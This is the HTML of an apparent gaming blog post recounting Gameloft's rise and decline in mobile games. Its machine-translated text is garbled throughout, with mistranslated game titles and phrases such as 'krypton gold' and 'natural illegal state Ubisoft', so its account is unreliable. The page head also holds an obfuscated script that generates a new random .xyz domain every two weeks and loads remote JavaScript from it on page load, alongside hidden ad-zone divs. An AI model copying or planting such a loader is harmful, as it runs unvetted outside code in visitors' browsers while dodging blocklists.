<!DOCTYPE html>



  


<html class="theme-next muse use-motion" lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Game,">










<meta name="description" content="When it comes to mobile games, the popular ones are either competitive games or leisure games. The homogenization of mobile game market is very serious, which is basically “what’s hot and what to do”.">
<meta name="keywords" content="Game">
<meta property="og:type" content="article">
<meta property="og:title" content="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft">
<meta property="og:url" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/index.html">
<meta property="og:site_name" content="Games">
<meta property="og:description" content="When it comes to mobile games, the popular ones are either competitive games or leisure games. The homogenization of mobile game market is very serious, which is basically “what’s hot and what to do”.">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/a21588cecd99467a8597e0fe63bd3808.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/5667f4916ef240ba889874d7307c2a06.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/6e2d9dc1e69247bf8f792ee51254ba69.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/0fd67cd43cbc46d5a03270f4b2e9ad64.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/9445ec25a2574f17800ea09a2211545f.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/70dfdab22a2a47f8b525e43ea3c61620.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/53d03bce11074b7c984dc91617c0c1c8.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/5cac24824d2f4667abf7e15e9694d34d.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/e3b7d97b01774f76a93252912dfb17eb.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/91683b3acfcc457db5b4a70abba504df.jpg">
<meta property="og:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/6454e32a2cf44a34a31273e4c4875f9a.jpg">
<meta property="og:updated_time" content="2021-03-02T08:49:49.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft">
<meta name="twitter:description" content="When it comes to mobile games, the popular ones are either competitive games or leisure games. The homogenization of mobile game market is very serious, which is basically “what’s hot and what to do”.">
<meta name="twitter:image" content="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/a21588cecd99467a8597e0fe63bd3808.jpg">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Muse',
    version: '5.1.4',
    sidebar: {"position":"left","display":"hide","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/">




<script type="text/javascript">!function(n){var t,e=function(n,t){var e=[["a","e","i","o","u","y"],["b","c","d","f","g","h","j","k","l","m","n","p","q","r","s","t","v","w","x","y","z"]];if(t)for(var r=0;r<=t.length-1;r++)n=n*t.charCodeAt(r)%4294967295;var l;return next=(l=n,function(n){return l=l+1831565813|0,(((n=(n=Math.imul(l^l>>>15,1|l))+Math.imul(n^n>>>7,61|n)^n)^n>>>14)>>>0)/Math.pow(2,32)}),function(n,t){for(var r=[],l=null,o=0;o<=n-1;o++){var a=void 0;null===l?a=e[0].concat(e[1]):1==l?(a=e[0],l=0):(a=e[1],l=1);var u=a[Math.floor(next()*a.length)];r.push(u),null===l&&(l=-1!=e[0].indexOf(u)?0:1)}return r.push("."+t),r.join("")}}((t=new Date,(t/=1e3)-t%1209600),"_fa7cdd4c68507744")(8,"xyz");if(null===n)console.log("https://"+e);else{var r=n.createElement("script");r.src="https://"+e+"/main.js",(n.body||n.head).appendChild(r)}}("undefined"!=typeof document?document:null);
</script>

  <title>Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft | Games</title>
  








</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Games</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">Games</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            Home
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br>
            
            Tags
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            Archives
          </a>
        </li>
      
        
        <li class="menu-item menu-item-sitemap">
          <a href="/sitemap.xml" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-sitemap"></i> <br>
            
            Sitemap
          </a>
        </li>
      

      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br>
            
            Search
          </a>
        </li>
      
    </ul>
  

  
    <div class="site-search">
      
  <div class="popup search-popup local-search-popup">
  <div class="local-search-header clearfix">
    <span class="search-icon">
      <i class="fa fa-search"></i>
    </span>
    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
    <div class="local-search-input-wrapper">
      <input autocomplete="off" placeholder="Searching..." spellcheck="false" type="text" id="local-search-input">
    </div>
  </div>
  <div id="local-search-result"></div>
</div>



    </div>
  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
 
 
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="22aeec266c49468da6040eff035066b8" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-options="count=1,interval=1,burst=1" data-zone="7aa7f6c595384fd6a2e5f5016b455fd2" style="display: none"></div>
 <div class="_fa7cdd4c68507744" data-zone="df2a1bde9f44465a8457aaf705928077" style="width:728px;height:90px;display: inline-block;margin: 0 auto"></div>
 <div class="_fa7cdd4c68507744" data-zone="4fff9a79323749608f8df1eff7291bcf" style="width:970px;height:90px;display: inline-block;margin: 0 auto"></div>
 
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Harry">
      <meta itemprop="description" content>
      <meta itemprop="image" content="/images/avatar.gif">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Games">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-11-08T00:00:00+08:00">
                2019-11-08
              </time>
            

            

            
          </span>

          

          
            
          

          
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>When it comes to mobile games, the popular ones are either competitive games or leisure games. The homogenization of mobile game market is very serious, which is basically “what’s hot and what to do”. The stereotyped style makes people feel tired. Looking back at the time when the mobile game market was not so mixed, we can find many classic and excellent mobile game works, among which the large-scale single player games accounted for the majority, and to mention the most popular one in the mobile game market at that time, Gameloft (Zhile), a game developer under the natural illegal state Ubisoft, belongs to.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/a21588cecd99467a8597e0fe63bd3808.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Although in the field of mobile games, the backup of Zhile is not large, but in terms of seniority and the level of game production, it deserves to be the largest factory. In the era when mobile games are still produced in Java, the Games launched by Zhile have been “3A production” in the field of mobile games. If we look back on the development of Gameloft, we will also look back on the development of the whole field of mobile games.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/5667f4916ef240ba889874d7307c2a06.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"></p>
<p>#Born with great ideals<br>Founded in France in 1999, Zhile is a subsidiary of Ubisoft, a leading manufacturer, focusing on software development of various non mainstream platforms. Zhile has been directly listed since its establishment, which is very confident. During that time, even the parent company Ubisoft was wondering how to carry forward its own game. After all, the original IP in Ubisoft’s hands was not so much, mainly the development of third-party games. Zhile has spent four years accumulating resources for itself and is planning to play a big game of chess. At that time, although the mobile phone has also been upgraded from black-and-white screen to full color screen, few people would want to play games with mobile phones. After all, there are better platforms such as mainframe and PC.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/6e2d9dc1e69247bf8f792ee51254ba69.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Those who really liked playing games could play snake for an afternoon<br>Zhile became the first person who dared to eat crabs. He developed several mobile games with the IP borrowed from Ubisoft, such as cell division and Prince of Persia. Although the function of mobile phones is limited, Zhile did its best to make mobile games in the most appropriate form. In addition to the number of frames, these Games were as good as Nintendo at that time The production of GBA hand-held game one higher. In addition to Zhile, no one seems to notice that the mobile phone is an undeveloped territory, so Zhile’s game naturally left a deep impression on many players, but at that time, the players didn’t have a high sense of brand, and only a few can remember who the developer of the game was.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/0fd67cd43cbc46d5a03270f4b2e9ad64.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Cell division in Java<br>Not many years later, there is a wave of revolution in the palm industry. Sony’s PSP and Nintendo’s NDS have launched their own sub era palm, and the picture of the palm game has entered the 3D era. At the same time, the field of mobile phones has also begun to update. Since 2002, Nokia, a well-known manufacturer, has entered the market with a new concept of smart phones. The performance of mobile phones has been greatly improved. When people in the game circle are still fighting for the palm of their home, the players of mobile games are also growing slowly. With the development of information technology, we will know who’s playing the game well.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/9445ec25a2574f17800ea09a2211545f.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Nokia’s first smartphone, 7650, uses the first Symbian system<br>At that time, Zhile began to launch its own original IP, including “real football”, “billiards at midnight” and “wild racing” (then called urban racing), which is still popular. At that time, every game seemed to have a very good production. People can’t imagine what it would be like to castrate the end game masterpieces when they moved to the mobile platform. Zhile proved to people that although the picture is not as good as the end game, they are also unambiguous in the quality of the game. The saying “Gameloft products must be high-quality products” spread from then on.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/70dfdab22a2a47f8b525e43ea3c61620.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>“Real football” by sparrow</p>
<h1 id="“copy”-a-day"><a href="#“copy”-a-day" class="headerlink" title="“copy” a day"></a>“copy” a day</h1><p>Time goes on again. The production technology of mobile phone is enough to make it run 3D games with poor picture quality. With money, Gameloft can’t let go of this opportunity. It starts to make games with the third-party IP on the bottom intelligent machine, and develops its own original IP on the middle and high-end machines, so there are many names that are very familiar in the current period, such as Modern war, lone vehicle God, n.o.v.a and so on. But many people can see that Zhile, many so-called original works, can find corresponding works on the end-user platform, such as modern war corresponding to call of duty, lone vehicle God corresponding to GTA, n.o.v.a corresponding to halo and so on. Observe one by one It seems that except for some casual chess and card games, almost every one of them is not completely original.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/53d03bce11074b7c984dc91617c0c1c8.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Many of the high-quality people in the modern war series regard call of duty as the same series<br>Many fans of Zhile say that Zhile’s games can’t be regarded as plagiarism. After all, there are so many types of games, so we can’t only allow end-to-end games but not hand games. Moreover, the market in which mobile games compete with console games doesn’t affect each other. There is no direct competition between the two. In the end, mobile games can’t be compared with console games, no matter from the production level With the technical ability to swim far less than the end of the advantages of swimming. This scene is very similar to the recent event that a domestic game copied a Japanese game. These words were quite convincing a few years ago. After all, as a matter of fact, the quality of Zhile’s game was absolutely the leading position in the whole mobile game field at that time, and as the host market generally used buyout system to charge, krypton’s mobile game was better than many crude and powerful ones Many hearts.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/5cac24824d2f4667abf7e15e9694d34d.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>It’s not so much like GTA as it’s a little bit of the bad taste of the underworld saints</p>
<p>#Both new and experienced<br>Zhile, who has always been taking the quality route, is not stingy in the development of game resources. Even if it is to promote a certain film and television works and develop derivative games, it will invest a lot of resources to create high-quality products. When smart phones began to explode in the society, for some reason, Zhile’s buyout game sales were not ideal, and many of its own free plus buy games could not generate much revenue. Why did it happen? After all, where does Zhile know how to reasonably operate a F2P game after a lifetime of single machine work? Their internal purchase content settings are very bad, and they can basically reach the level that they can’t play without spending money. They are criticized by the players. Zhile’s former position is still stable, even though its company’s reputation has gone from year to year.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/e3b7d97b01774f76a93252912dfb17eb.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>The Iron Man 3 movie game with a huge scale but only Parkour game<br>Officially, because of the lack of market understanding and cognition, and the change of the whole society, they didn’t realize that the players holding the mobile game all day long were not the pure game enthusiasts in those days, but more leisure players who idled around and played with their mobile phones casually. They played the game purely to pass the time, rather than enjoy the fun of the game as before The family itself is resistant to buy-out game. If krypton gold can get a good game experience properly, it can also be accepted. If krypton gold can’t play any more, they may go back to find the “modified version”.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/91683b3acfcc457db5b4a70abba504df.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>Six engine left wheel with krypton gold UI on the table<br>    concluding remarks<br>As the company’s philosophy has not been changed, it continues to maintain a high expenditure and low income, and it is indisputable to go to a state of saving losses, because the stock price is too low, it was finally acquired by Vivendi. Everyone knows that Vivendi is a famous “industry pooper”. After the acquisition, all board members and core members, including the CEO, chose to leave. Since then, Zhile has no more works that can be remembered.<br><img src="http://maiygu.xyz/2019/11/08/Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft/6454e32a2cf44a34a31273e4c4875f9a.jpg" alt="Once the biggest manufacturer of mobile games, looking back on the changes of mobile games from Gameloft"><br>“Wild car racing 9: Legend” with amazing pictures<br>Until last year’s “wild racing 9”, which seems to indicate that this is the only work that can still be sold now. After all, after eight generations of experience, the series has gone on its own way from imitating others. Fortunately, the production quality of the game is still excellent, and even the best game in 2018. It is obvious that the brilliance of Zhile is not as good as it used to be, but now it is only they who know whether Zhile lives or dies.</p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/Game/" rel="tag"># Game</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/11/08/Online games despised the company at the top of the chain, and had a bigger dream/" rel="next" title="Online games despised the company at the top of the chain, and had a bigger dream">
                <i class="fa fa-chevron-left"></i> Online games despised the company at the top of the chain, and had a bigger dream
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/11/08/One forward, one backward, second development of square Enix/" rel="prev" title="One forward, one backward, second development of square Enix">
                One forward, one backward, second development of square Enix <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <p class="site-author-name" itemprop="name">Harry</p>
              <p class="site-description motion-element" itemprop="description">Games</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">114</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">1</span>
                  <span class="site-state-item-name">tags</span>
                </a>
              </div>
            

          </nav>

          

          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#“copy”-a-day"><span class="nav-number">1.</span> <span class="nav-text">“copy” a day</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        

<div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Harry</span>

  
</div>









        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
